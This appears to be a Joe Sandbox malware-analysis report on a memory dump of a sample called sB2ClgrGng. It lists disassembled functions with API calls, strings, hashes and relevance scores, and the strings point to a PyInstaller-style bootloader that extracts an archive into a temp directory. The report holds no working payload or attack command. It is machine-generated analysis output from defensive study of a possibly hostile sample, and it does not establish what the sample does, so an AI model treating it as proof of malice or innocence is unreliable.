Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 3130ba89440e5f17199f01b0e4791b374f000c21622634472f1aacc44fbfb46c
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 64F04422B1C6418AF760BB64B8DA7667350BB84764F040235DE7D42AD8DF3CD0498A04

Function 00007FF644871950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF644877F90: _fread_nolock.LIBCMT ref: 00007FF64487803A

_fread_nolock.LIBCMT ref: 00007FF644871A1B

Part of subcall function 00007FF644872910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E

Strings

Failed to read cookie!, xrefs: 00007FF644871A2B
Failed to seek to cookie position!, xrefs: 00007FF6448719EE
Could not read full TOC!, xrefs: 00007FF644871B55
Could not allocate buffer for TOC!, xrefs: 00007FF644871B1B
Could not allocate memory for archive structure!, xrefs: 00007FF644871A61
MEI, xrefs: 00007FF644871991
fread, xrefs: 00007FF644871A32, 00007FF644871B5C
malloc, xrefs: 00007FF644871B22
Error on file., xrefs: 00007FF644871B8D
calloc, xrefs: 00007FF644871A68
fseek, xrefs: 00007FF6448719F5

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
Instruction ID: c8e74e29ab882016d0b012d010cee4df9487ba3c87560a8a27fd1fd941d9d4a7
Opcode Fuzzy Hash: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
Instruction Fuzzy Hash: D0816F71B0CA868DEB60FB1498D26B96390EF84785F444435DD8DC7B8EDE3DE5858740

Function 00007FF644871600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to create symbolic link %s!, xrefs: 00007FF644871622
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6448716A2
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF644871742
fwrite, xrefs: 00007FF6448717D1
fread, xrefs: 00007FF6448717E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6448717DF
Failed to extract %s: failed to open target file!, xrefs: 00007FF64487165C
malloc, xrefs: 00007FF644871749
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6448716DA
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6448717CA
fopen, xrefs: 00007FF644871663
fseek, xrefs: 00007FF6448716E1

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
Instruction ID: 635ceeb1053f39f318ee80f1db6a56b6941fd15b0c0ac8b1c02c80825c6da8db
Opcode Fuzzy Hash: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
Instruction Fuzzy Hash: 8E519D21B0CA479AEA10BB61A8E35B96390BF84B94F544535EE0C87BDEEF3DE545D300

Function 00007FF644878660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF644873CBB), ref: 00007FF644878704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF644873CBB), ref: 00007FF64487870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF644873CBB), ref: 00007FF64487874C

Part of subcall function 00007FF644878830: GetEnvironmentVariableW.KERNEL32(00007FF64487388E), ref: 00007FF644878867
Part of subcall function 00007FF644878830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF644878889

Part of subcall function 00007FF644888238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644888251

Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF6448786DC
TMP, xrefs: 00007FF6448786C2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF64487877E
_MEI%d, xrefs: 00007FF644878712
TMP, xrefs: 00007FF64487869C, 00007FF6448787A3

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction ID: 40fb5a91a1e8ec0f6027071174944447d2761233b90d69bca2c88638ece993cd
Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction Fuzzy Hash: CE416E21B1DA468CFA20F766A9E72B91291AF85BC0F804135ED0ED77DEEE3CE5018300

Function 00007FF644871210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6448712BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF644871276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF64487141E
malloc, xrefs: 00007FF6448712C1, 00007FF6448712F6
1.3.1, xrefs: 00007FF644871249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6448712EF

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
Instruction ID: de75c900769d35fff3529f518f4e3621aba89e85ccf8640be368e0b3e218b3a5
Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
Instruction Fuzzy Hash: 8B51A322B0C64289EA60BF15A8A23BA6291FF85B95F444135ED4DC7BDEEF3CE545C700

Function 00007FF64488ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF64488F0AA,?,?,-00000018,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE8C
GetProcAddress.KERNEL32(?,?,?,00007FF64488F0AA,?,?,-00000018,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE98

Strings

ext-ms-, xrefs: 00007FF64488EDE9
api-ms-, xrefs: 00007FF64488EDD6

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 4861471d91912b6eac5c630d5e78980341220ec49ac5bb6e81186349b14b345c
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 8941CF61B1DA1289FA16FB16AC926752391FF49BA0F884539DD1DD778CEF3CE8498300

Function 00007FF6448736B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF644873804), ref: 00007FF6448736E1
GetLastError.KERNEL32(?,00007FF644873804), ref: 00007FF6448736EB

Part of subcall function 00007FF644872C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
Part of subcall function 00007FF644872C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
Part of subcall function 00007FF644872C50: MessageBoxW.USER32 ref: 00007FF644872D99

Strings

Failed to obtain executable path., xrefs: 00007FF6448736F3
Failed to resolve full path to executable %ls., xrefs: 00007FF644873739
\\?\, xrefs: 00007FF64487375A
Failed to convert executable path to UTF-8., xrefs: 00007FF644873790
GetModuleFileNameW, xrefs: 00007FF6448736FA

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 79b64d87b335e42266532746fd6705270bcfbca3dbfccebbacd77672012858d3
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: 402153A1B1CA4299FA20F724ECA73B66250BF98394F804136DE5DC65DDEF2DE504C701

Function 00007FF64488BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488BE89

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction ID: fc3e10131e72d4b54e171f405471ba1110d25cf7302ebdd2061e1b2bde9458ab
Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction Fuzzy Hash: 19C1DF22A0CA869AE660BB1594C22BD7B91FFC1B90F554131FE4E8779ADF7CE845C700

Function 00007FF644878570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF644878590
OpenProcessToken.ADVAPI32 ref: 00007FF6448785A3
GetTokenInformation.KERNELBASE ref: 00007FF6448785C8
GetLastError.KERNEL32 ref: 00007FF6448785D2
GetTokenInformation.KERNELBASE ref: 00007FF644878612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64487862E
CloseHandle.KERNEL32 ref: 00007FF644878646

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction ID: 8ff23daac34e28f961cb8ae23d9edeb7e9f529dbe03ddca6641a9341b4c75295
Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction Fuzzy Hash: 19215131B0CA4696EA10BB55B9D622AA3A0FFC57A0F500635EE6D83AECDE7DD4458700

Function 00007FF6448790E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF644878570: GetCurrentProcess.KERNEL32 ref: 00007FF644878590
Part of subcall function 00007FF644878570: OpenProcessToken.ADVAPI32 ref: 00007FF6448785A3
Part of subcall function 00007FF644878570: GetTokenInformation.KERNELBASE ref: 00007FF6448785C8
Part of subcall function 00007FF644878570: GetLastError.KERNEL32 ref: 00007FF6448785D2
Part of subcall function 00007FF644878570: GetTokenInformation.KERNELBASE ref: 00007FF644878612
Part of subcall function 00007FF644878570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64487862E
Part of subcall function 00007FF644878570: CloseHandle.KERNEL32 ref: 00007FF644878646

LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF64487916C
LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF644879175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF644879142
S-1-3-4, xrefs: 00007FF644879121
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF644879183
D:(A;;FA;;;%s), xrefs: 00007FF644879157

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: bce3d37799d3d9e335fbfa39cce7c57ba69659e3440c3ac35b5d8b626efc252f
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: AF215E21B0CB4289F610BB10E9A62EA62A5FF88780F444035EE4D83B9EDF3DD845C750

Function 00007FF64488CF60 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D107

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: 5c65de6c93bbf58159ffcbd566a08658796fc6587735b1be415a64b3287ab632
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: A9919032E1C6528DF760BF6594C22BD6BE0BB54B88F145139DE0EA6A9DDF38E446C700

Function 00007FF644885628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644885655
CreateFileW.KERNELBASE ref: 00007FF644885694
CloseHandle.KERNEL32 ref: 00007FF6448856C9

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: 094555275460e41ab38db995bfd1209cf170517ad3ba8f7937622459db9d6069
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: A1417122D1C7818BE754BB6095923697760FB947A4F109335EE9C83ADAEF7CE5E08700

Function 00007FF64487CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64487CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF64487CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF64487CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF64487CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF64487CD21

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 20406683c3d03415e07bcf6f084e28491c8a870ba451ed3030105021b52fbf39
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: AF311821F0C5468DFA54BB659CF32B91A81AFA1784F449035EE0EC72DFDE6DE844D211

Function 00007FF644889A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF644889A2C), ref: 00007FF644889A41
TerminateProcess.KERNEL32(?,?,?,00007FF644889A2C), ref: 00007FF644889A4C
ExitProcess.KERNEL32 ref: 00007FF644889A5B

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: 240f978d4d5679595a8a0e148705fc900db8298baa73cb8d309c21d8b9dc4811
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: 3AD09210B0CB068AEB187B706CDB07812567F88B01F142438CC0F9639FEE2EE8894300

Function 00007FF64488013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644880180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644880277

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: db6755850ae78ef7e38998cba850e33e3dd2e148651b14ab5a6fe3f820f7c41a
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
